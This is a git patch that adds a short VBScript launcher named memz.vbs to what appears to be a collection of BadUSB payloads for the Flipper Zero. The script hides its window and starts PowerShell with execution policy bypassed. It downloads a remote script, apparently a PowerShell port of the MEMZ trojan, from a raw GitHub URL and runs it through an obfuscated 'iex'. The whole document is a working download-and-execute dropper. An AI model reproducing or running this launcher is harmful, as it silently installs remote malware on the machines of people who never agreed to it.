From d6babd423eb8c4094b02880b3b9601dc3c2fb4ce Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 30 May 2024 21:26:03 +0000 Subject: [PATCH] Add files via upload --- MEMZ-In-Powershell/memz.vbs | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 MEMZ-In-Powershell/memz.vbs diff --git a/MEMZ-In-Powershell/memz.vbs b/MEMZ-In-Powershell/memz.vbs new file mode 100644 index 0000000..7e64bd3 --- /dev/null +++ b/MEMZ-In-Powershell/memz.vbs @@ -0,0 +1,4 @@ +Set WshShell = WScript.CreateObject("WScript.Shell") +WScript.Sleep 200 +WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True +